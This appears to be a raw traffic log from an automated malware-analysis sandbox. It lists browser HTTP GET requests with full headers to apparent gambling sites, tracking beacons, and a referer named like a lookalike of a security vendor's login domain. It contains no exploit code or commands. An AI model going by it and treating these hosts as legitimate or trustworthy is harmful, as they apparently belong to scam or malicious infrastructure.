Source: global trafficHTTP traffic detected: GET /ocs/cc.png?1717972840810 HTTP/1.1Host: ocsapi1961.hydqef.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://hg679.ccSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://hg679.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /uploads/hg1000-100.gif HTTP/1.1Host: www.image110.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /uploads/f99c3fc30e9a9c1b3a5474816d8e5a69.gif HTTP/1.1Host: www.image110.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: hg679.ccConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: com_env=p
Source: global trafficHTTP traffic detected: GET /uploads/e3d05ef563eb19591102e658dd7cdf90.gif HTTP/1.1Host: www.image110.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /c?_=600260993449164800 HTTP/1.1Host: api.tongjiniao.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: http://www.bitdefenderlogin.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /uploads/d9a8a9dffbb7ab07051ddea5260b8132.gif HTTP/1.1Host: www.image110.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ocs/cc.png?1717972843131 HTTP/1.1Host: ocsapi-aka.blackkhaki918.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://hg679.ccSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://hg679.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ocs/cc.png?1717972843129 HTTP/1.1Host: ocsapi-aws.bakeddove.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://hg679.ccSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://hg679.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ocs/cc.png?1717972840810 HTTP/1.1Host: ocsapi1961.hydqef.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: e933002.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: e933002.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://e933002.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /lt-cloud/stat.do?pv=ajax&pa=host.info&domain=hg679.cc&withAgentCode=1&withSettings=1&terminal=1&ts=17972844545290 HTTP/1.1Host: ocsapi-aka.blackkhaki918.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://hg679.ccSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://hg679.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ocs/cc.png?1717972843131 HTTP/1.1Host: ocsapi-aka.blackkhaki918.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ocs/cc.png?1717972843129 HTTP/1.1Host: ocsapi-aws.bakeddove.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ftl/commonPage/themes/gui-base.css HTTP/1.1Host: brhrjf.yuhu06.xyzConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://x551005.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ftl/commonPage/themes/gui-skin-default.css HTTP/1.1Host: brhrjf.yuhu06.xyzConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://x551005.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ftl/bet365-1761/themes/style/common.css HTTP/1.1Host: brhrjf.yuhu06.xyzConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://x551005.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /lt-cloud/stat.do?pv=ajax&pa=host.info&domain=hg679.cc&withAgentCode=1&withSettings=1&terminal=1&ts=17972844545290 HTTP/1.1Host: ocsapi-aka.blackkhaki918.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /default.html HTTP/1.1Host: hg679.ccConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://hg679.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: com_env=p
Source: global trafficHTTP traffic detected: GET /ftl/bet365-1761/themes/style/bootstrap-dialog.min.css HTTP/1.1Host: brhrjf.yuhu06.xyzConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://x551005.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: e933002.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: xpj723.ccConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ocs/zbw?r=6891640824 HTTP/1.1Host: ocsapi-aka.blackkhaki918.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://hg679.ccSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://hg679.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ftl/commonPage/zh_CN/pubads/images/ads1.png HTTP/1.1Host: x551005.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://x551005.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ftl/commonPage/zh_CN/pubads/images/ads2.png HTTP/1.1Host: x551005.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://x551005.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ftl/commonPage/themes/hongbao.css HTTP/1.1Host: brhrjf.yuhu06.xyzConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://brhrjf.yuhu06.xyz/ftl/commonPage/themes/gui-base.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: xpj723.ccConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://xpj723.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: com_env=p
Source: global trafficHTTP traffic detected: GET /?__CBK=394cc31f8c309f483229bca9f91b9e5621717972847_12137297 HTTP/1.1Host: e933002.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://e933002.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: e933002.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://e933002.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ocs/cc.png?1717972848771 HTTP/1.1Host: ocsapi1961.hydqef.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://xpj723.ccSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://xpj723.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cc.png?r=7134333617 HTTP/1.1Host: zb-hw.czwygs.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://hg679.ccSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://hg679.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ftl/commonPage/themes/gui-layer.css HTTP/1.1Host: brhrjf.yuhu06.xyzConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://brhrjf.yuhu06.xyz/ftl/commonPage/themes/gui-base.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ftl/commonPage/js/jquery/jquery-1.11.3.min.js HTTP/1.1Host: brhrjf.yuhu06.xyzConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://x551005.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ftl/commonPage/js/float.js HTTP/1.1Host: brhrjf.yuhu06.xyzConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://x551005.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: xpj723.ccConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: com_env=p
Source: global trafficHTTP traffic detected: GET /ocs/zbw?r=6891640824 HTTP/1.1Host: ocsapi-aka.blackkhaki918.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cc.png?r=6084701866 HTTP/1.1Host: zb1-hw.qectyoua.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://hg679.ccSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://hg679.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /zb-cloud/stat.do?pv=ajax&pa=host.info&domain=hg679.cc&terminal=1&r=6412591773 HTTP/1.1Host: ahd-ocssn.qqxgo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://hg679.ccSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://hg679.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cc.png?r=8877277658 HTTP/1.1Host: zb-qq.gzjqwlkj.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://hg679.ccSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://hg679.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /zb-cloud/stat.do?pv=ajax&pa=host.info&domain=hg679.cc&terminal=1&r=6412591773 HTTP/1.1Host: ocsapi-lc.tingmeikj.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://hg679.ccSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://hg679.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ftl/commonPage/zh_CN/pubads/images/ads1.png HTTP/1.1Host: x551005.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ftl/commonPage/zh_CN/pubads/images/ads2.png HTTP/1.1Host: x551005.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /lt-cloud/stat.do?pv=ajax&pa=host.info&domain=xpj723.cc&withAgentCode=1&withSettings=1&terminal=1&ts=17972850573425 HTTP/1.1Host: ocsapi1961.hydqef.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://xpj723.ccSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://xpj723.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ocs/cc.png?1717972848771 HTTP/1.1Host: ocsapi1961.hydqef.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/240516-03/static/css/t4091.css HTTP/1.1Host: zb-hw.czwygs.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://hg679.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ftl/commonPage/js/idangerous.swiper.min.js HTTP/1.1Host: brhrjf.yuhu06.xyzConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://x551005.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
